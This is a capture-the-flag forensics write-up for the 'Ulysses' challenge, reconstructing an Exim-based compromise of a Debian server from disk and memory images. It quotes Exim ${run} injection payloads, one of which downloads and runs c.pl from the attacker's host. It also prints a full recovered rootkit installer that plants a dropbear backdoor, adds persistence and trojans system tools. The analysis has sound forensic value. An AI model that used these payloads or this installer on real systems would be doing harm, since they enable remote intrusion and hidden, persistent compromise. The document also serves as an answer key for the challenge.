Ulysses - Memory Image Forensics

The attacker was performing a Brute Force attack. What account triggered the alert?

- Open victoria-v8.sda1.img in AccessData FTK Imager (or any tool that can browse the ext filesystem of the disk image) and view /var/log/auth.log
- The brute-forced account is the one named in the long run of repeated "Failed password for <user> from <ip>" sshd entries

How many failed attempts were there?

- Count the "Failed password" lines in that log (e.g. grep -c 'Failed password' auth.log); match the log's capitalisation, since grep is case-sensitive by default

What kind of system runs on the targeted server?

- The hint says to Google "Identify Linux system"
- Read /etc/issue from the disk image; it names the distribution and release. The Volatility profile used below (LinuxDebian5_26x86) must agree with what you find, otherwise the memory plugins will not parse the image.

What is the victim's IP address?

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190                 udevd/776   
UDP      0.0.0.0         :  111 0.0.0.0         :    0                           portmap/1429 
TCP      0.0.0.0         :  111 0.0.0.0         :    0 LISTEN                    portmap/1429 
UDP      0.0.0.0         :  769 0.0.0.0         :    0                         rpc.statd/1441 
UDP      0.0.0.0         :38921 0.0.0.0         :    0                         rpc.statd/1441 
TCP      0.0.0.0         :39296 0.0.0.0         :    0 LISTEN                  rpc.statd/1441 
UDP      0.0.0.0         :   68 0.0.0.0         :    0                         dhclient3/1624 
UNIX 5069             dhclient3/1624  
UNIX 4617              rsyslogd/1661  /dev/log
UNIX 4636                 acpid/1672  /var/run/acpid.socket
UNIX 4638                 acpid/1672  
TCP      ::              :   22 ::              :    0 LISTEN                       sshd/1687 
TCP      0.0.0.0         :   22 0.0.0.0         :    0 LISTEN                       sshd/1687 
TCP      ::              :   25 ::              :    0 LISTEN                      exim4/1942 
TCP      0.0.0.0         :   25 0.0.0.0         :    0 LISTEN                      exim4/1942 
UNIX 5132                 login/1990  
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :56955 192.168.56.1    : 8888 ESTABLISHED                    nc/2169 

192.168.56.102 — the local (left-hand) address on every ESTABLISHED and CLOSE socket above; the listeners bound to 0.0.0.0/:: do not reveal it

What are the attacker's two IP addresses? Format: comma-separated in ascending order

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190                 udevd/776   
UDP      0.0.0.0         :  111 0.0.0.0         :    0                           portmap/1429 
TCP      0.0.0.0         :  111 0.0.0.0         :    0 LISTEN                    portmap/1429 
UDP      0.0.0.0         :  769 0.0.0.0         :    0                         rpc.statd/1441 
UDP      0.0.0.0         :38921 0.0.0.0         :    0                         rpc.statd/1441 
TCP      0.0.0.0         :39296 0.0.0.0         :    0 LISTEN                  rpc.statd/1441 
UDP      0.0.0.0         :   68 0.0.0.0         :    0                         dhclient3/1624 
UNIX 5069             dhclient3/1624  
UNIX 4617              rsyslogd/1661  /dev/log
UNIX 4636                 acpid/1672  /var/run/acpid.socket
UNIX 4638                 acpid/1672  
TCP      ::              :   22 ::              :    0 LISTEN                       sshd/1687 
TCP      0.0.0.0         :   22 0.0.0.0         :    0 LISTEN                       sshd/1687 
TCP      ::              :   25 ::              :    0 LISTEN                      exim4/1942 
TCP      0.0.0.0         :   25 0.0.0.0         :    0 LISTEN                      exim4/1942 
UNIX 5132                 login/1990  
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :56955 192.168.56.1    : 8888 ESTABLISHED                    nc/2169 

192.168.56.1,192.168.56.101 — 192.168.56.1 is the remote end of the sh/2065 reverse shell (port 4444), of the nc/2169 connection (port 8888) and the host c.pl was wget'ed from (see the rejectlog below); 192.168.56.101 is the client that connected to exim4 on port 25, the socket sh/2065 still holds in CLOSE state

What is the "nc" service PID number that was running on the server?

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
Offset     Name                 Pid             PPid            Uid             Gid    DTB        Start Time
---------- -------------------- --------------- --------------- --------------- ------ ---------- ----------
0xcf42f900 init                 1               0               0               0      0x0f4b8000 2011-02-06 12:04:09 UTC+0000
0xcf42f4e0 kthreadd             2               0               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42f0c0 migration/0          3               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42eca0 ksoftirqd/0          4               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e880 watchdog/0           5               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e460 events/0             6               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e040 khelper              7               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1a40 kblockd/0            39              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1200 kacpid               41              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf45d140 kacpi_notify         42              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf46c940 kseriod              86              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf43f100 pdflush              123             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d980 pdflush              124             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d560 kswapd0              125             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf43f520 aio/0                126             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45c4e0 ksuspend_usbd        581             2               0               0      ---------- 2011-02-06 12:04:14 UTC+0000
0xcf48d1c0 khubd                582             2               0               0      ---------- 2011-02-06 12:04:14 UTC+0000
0xcf46d9c0 ata/0                594             2               0               0      ---------- 2011-02-06 12:04:15 UTC+0000
0xcf802a00 ata_aux              595             2               0               0      ---------- 2011-02-06 12:04:15 UTC+0000
0xcf43e080 scsi_eh_0            634             2               0               0      ---------- 2011-02-06 12:04:17 UTC+0000
0xcf45c0c0 kjournald            700             2               0               0      ---------- 2011-02-06 12:04:18 UTC+0000
0xcf46d5a0 udevd                776             1               0               0      0x0f5b2000 2011-02-06 12:04:21 UTC+0000
0xce978620 kpsmoused            1110            2               0               0      ---------- 2011-02-06 12:04:27 UTC+0000
0xce9796a0 portmap              1429            1               1               1      0x0eddf000 2011-02-06 12:04:35 UTC+0000
0xce973b00 rpc.statd            1441            1               102             0      0x0f8b3000 2011-02-06 12:04:35 UTC+0000
0xcf45c900 dhclient3            1624            1               0               0      0x0ec3d000 2011-02-06 12:04:39 UTC+0000
0xce972660 rsyslogd             1661            1               0               0      0x0e7ed000 2011-02-06 12:04:40 UTC+0000
0xcf43ece0 acpid                1672            1               0               0      0x0f8a8000 2011-02-06 12:04:40 UTC+0000
0xce979ac0 sshd                 1687            1               0               0      0x0fa65000 2011-02-06 12:04:41 UTC+0000
0xcf45cd20 exim4                1942            1               101             103    0x0e7bc000 2011-02-06 12:04:44 UTC+0000
0xcf803a80 cron                 1973            1               0               0      0x0f815000 2011-02-06 12:04:45 UTC+0000
0xcfaad720 login                1990            1               0               0      0x0eecf000 2011-02-06 12:04:45 UTC+0000
0xcf48c560 getty                1992            1               0               0      0x0ea31000 2011-02-06 12:04:45 UTC+0000
0xcf803240 getty                1994            1               0               0      0x0f671000 2011-02-06 12:04:45 UTC+0000
0xcf4a1620 getty                1996            1               0               0      0x0f838000 2011-02-06 12:04:45 UTC+0000
0xcf46cd60 getty                1998            1               0               0      0x0f83d000 2011-02-06 12:04:45 UTC+0000
0xcf4a0180 getty                2000            1               0               0      0x0e89e000 2011-02-06 12:04:45 UTC+0000
0xcf8021c0 bash                 2042            1990            0               0      0x0eecc000 2011-02-06 14:04:38 UTC+0000
0xcfaacee0 sh                   2065            1               0               0      0x0f517000 2011-02-06 14:07:15 UTC+0000
0xcfaac280 memdump              2168            2042            0               0      0x08088000 2011-02-06 14:42:27 UTC+0000
0xcf43e8c0 nc                   2169            2042            0               0      0x08084000 2011-02-06 14:42:27 UTC+0000

What service was exploited to gain access to the system?

# The exim4 logs under /var/log/exim4 (mainlog, rejectlog) contain the injected payloads. The netstat output corroborates it: sh/2065 still holds the port-25 socket from 192.168.56.101, i.e. the shell was spawned from an SMTP session, and in linux_pslist its PPID is 1 (likely reparented after the exim4 worker exited).
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
exim4

What is the CVE number of exploited vulnerability?

# The hint said 'Check logs carefully, then use your Google-fu'. The mainlog contained 'smtp' strings and the rejectlog holds ${run{...}} string-expansion payloads (quoted below), so search for the exim4 CVE describing remote code execution via string expansion over SMTP, and pin it to the exim4 package version installed on the disk image rather than guessing from the CVE list alone.

During this attack, the attacker downloaded two files to the server. What are they?

# Look carefully at the rejectlog: the injected ${run{...}} expansions show one file being removed (/tmp/rk.tar, so it was fetched earlier) and one being downloaded and executed (c.pl from 192.168.56.1). Only the two lines of interest are quoted here.
${run{/bin/sh -c "exec /bin/sh -c 'rm /tmp/rk.tar; sleep 1000'"}}
${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
c.pl,rk.tar

What are the two port numbers involved in the process of data exfiltration? Format: comma-separated in ascending order

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190                 udevd/776   
UDP      0.0.0.0         :  111 0.0.0.0         :    0                           portmap/1429 
TCP      0.0.0.0         :  111 0.0.0.0         :    0 LISTEN                    portmap/1429 
UDP      0.0.0.0         :  769 0.0.0.0         :    0                         rpc.statd/1441 
UDP      0.0.0.0         :38921 0.0.0.0         :    0                         rpc.statd/1441 
TCP      0.0.0.0         :39296 0.0.0.0         :    0 LISTEN                  rpc.statd/1441 
UDP      0.0.0.0         :   68 0.0.0.0         :    0                         dhclient3/1624 
UNIX 5069             dhclient3/1624  
UNIX 4617              rsyslogd/1661  /dev/log
UNIX 4636                 acpid/1672  /var/run/acpid.socket
UNIX 4638                 acpid/1672  
TCP      ::              :   22 ::              :    0 LISTEN                       sshd/1687 
TCP      0.0.0.0         :   22 0.0.0.0         :    0 LISTEN                       sshd/1687 
TCP      ::              :   25 ::              :    0 LISTEN                      exim4/1942 
TCP      0.0.0.0         :   25 0.0.0.0         :    0 LISTEN                      exim4/1942 
UNIX 5132                 login/1990  
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :56955 192.168.56.1    : 8888 ESTABLISHED                    nc/2169 
4444,8888 — the sh/2065 reverse shell to 192.168.56.1:4444 and the nc/2169 connection to 192.168.56.1:8888. Caveat: in linux_pslist, nc (2169) and memdump (2168) share the same parent bash (2042) and the same start time (14:42:27), which suggests nc was carrying the memory acquisition rather than attacker traffic; the challenge still expects both ports.

Which port did the attacker try to block on the firewall?

# Because the attacker only ran 'rm /tmp/rk.tar' (first ${run{...}} line above) rather than wiping it, the archive's data blocks likely survive in unallocated space on the disk image. The answer is the port in the iptables rules of install.sh below: 45295.
# Carve/export the tar from the image in FTK Imager (it comes out as an unnamed file, here "Untitled0"). Extract and read it only in an isolated analysis VM and never execute install.sh — it replaces system binaries and persists across reboots.
$ mv Untitled0 lol.tar
$ tar -xvf lol.tar
$ cd rk
$ cat install.sh
#!/bin/bash
# Rootkit installer recovered from /tmp/rk.tar. Evidence artifact: do not run
# outside an isolated analysis VM. Comments are analyst annotations.
IFS='
'
umask 0022
# Aborts unless vars.sh (which must define $rk_home_dir) sits alongside the script.
if [ ! -f vars.sh ]
then
    echo "Can't find vars.sh, exiting"
    exit
fi
source vars.sh
# Stage the backdoor SSH server (dropbear), a busybox and "mig" into the
# rootkit home directory, then mark them immutable/append-only (chattr +ia)
# so a plain rm or overwrite fails until the attributes are cleared.
mkdir -p $rk_home_dir
cp dropbear $rk_home_dir
chmod +x $rk_home_dir/dropbear
chattr +ia $rk_home_dir/dropbear
cp busybox $rk_home_dir
chmod +x $rk_home_dir/busybox
chattr +ia $rk_home_dir/busybox
cp mig $rk_home_dir
chattr +ia $rk_home_dir/mig


# Persistence variant 1 (systems with /etc/init.d/boot.local): start dropbear
# at boot and drop outbound TCP to port 45295 -- the port the question asks about.
if [ -x /etc/init.d/boot.local ]
then
    echo "autostart in /etc/init.d/boot.local"
    echo "$rk_home_dir/dropbear " >> /etc/init.d/boot.local
    echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/boot.local
fi


# Persistence variant 2 (systems with /etc/rc.d/rc.local).
if [ -x /etc/rc.d/rc.local ]
then
    echo "autostart in /etc/rc.d/rc.local"
    echo  "$rk_home_dir/dropbear">> /etc/rc.d/rc.local
    echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/rc.d/rc.local
fi

# Persistence variant 3 (Debian-like, detected by the presence of update-rc.d):
# a fake init script named "xfs3" registered for the default runlevels. On the
# Debian victim this is the branch expected to fire -- check /etc/init.d/xfs3
# and the /etc/rc*.d/ symlinks in the disk image.
dtest=`which update-rc.d`
if [ ! -z $dtest ]
then
    echo "debian like system"
    echo "$rk_home_dir/dropbear " >> /etc/init.d/xfs3
    echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/xfs3
    chmod +x /etc/init.d/xfs3
    update-rc.d xfs3 defaults
fi

# Start the backdoor immediately, without waiting for a reboot.
$rk_home_dir/dropbear

#################################### procps
# Trojanize every tool shipped in the archive's procps/ directory that also
# exists on the host: the installed binary is un-immutabled, deleted, replaced
# and re-locked with +ia. Live process listings on this host are therefore
# untrusted; rely on the memory image (linux_pslist) or a known-clean binary.
for l in `ls procps`
do
    o=`which $l`
    if [ ! -z $o ]
    then
    chattr -ia $o
    rm -f $o
    cp procps/$l $o
    chattr +ia $o
    fi
done
# Writes "dropbear" into an oddly placed file -- presumably a hide-list read by
# the replaced tools (confirm by inspecting them). Its presence is a useful IOC.
mkdir -p /usr/include/mysql
echo dropbear >> /usr/include/mysql/mysql.hh1
# Evicts a competing rootkit (SHV4/SHV5 ttymon/ttyload) if it is installed.
if [ -f /sbin/ttymon ]
then
    echo "WARNING: SHV5/SHV4 RK DETECTED"
    chattr -ia /sbin/ttymon /sbin/ttyload
    rm -f /sbin/ttymon /sbin/ttyload
    kill -9 `pidof ttymon`
    kill -9 `pidof ttyload`
fi
# Apply the firewall rule now as well. Note it is OUTPUT/--dport: it blocks
# connections *from* this host to port 45295, not inbound traffic to it.
iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP
echo 
echo 
echo 
echo "Don't forget to:"
echo "cd .."
echo "rm -rf rk rk.tbz2"
